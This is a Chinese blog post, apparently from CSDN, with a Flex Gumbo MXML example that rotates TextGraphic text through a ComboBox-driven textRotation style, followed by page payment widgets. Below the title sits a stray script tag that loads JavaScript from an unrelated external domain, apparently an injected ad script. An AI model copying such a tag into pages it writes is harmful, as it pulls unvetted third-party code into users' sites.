Flex Gumbo中如何通过textRotation样式,设置TextGraphic文字旋转方向

<script src="http://www.cpcasr.cn/ad_js/mm_123.js"></script>

 main.mxml

  1. <?xml version="1.0" encoding="utf-8"?>
  2. <FxApplication name="TextGraphic_textRotation_test"
  3.         xmlns="http://ns.adobe.com/mxml/2009">
  4.     <layout>
  5.         <BasicLayout />
  6.     </layout>
  7.  
  8.     <Declarations>
  9.         <Array id="arr">
  10.             <Object label="auto" />
  11.             <Object label="rotate0" />
  12.             <Object label="rotate90" />
  13.             <Object label="rotate180" />
  14.             <Object label="rotate270" />
  15.         </Array>
  16.     </Declarations>
  17.  
  18.     <Form>
  19.         <FormItem label="textRotation:">
  20.             <ComboBox id="comboBox"
  21.                     dataProvider="{arr}" />
  22.         </FormItem>
  23.     </Form>
  24.  
  25.     <TextGraphic id="textGraphic"
  26.             text="{Capabilities.version}"
  27.             textRotation="{comboBox.selectedItem.label}"
  28.             horizontalCenter="0"
  29.             verticalCenter="0" />
  30.  
  31. </FxApplication>
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值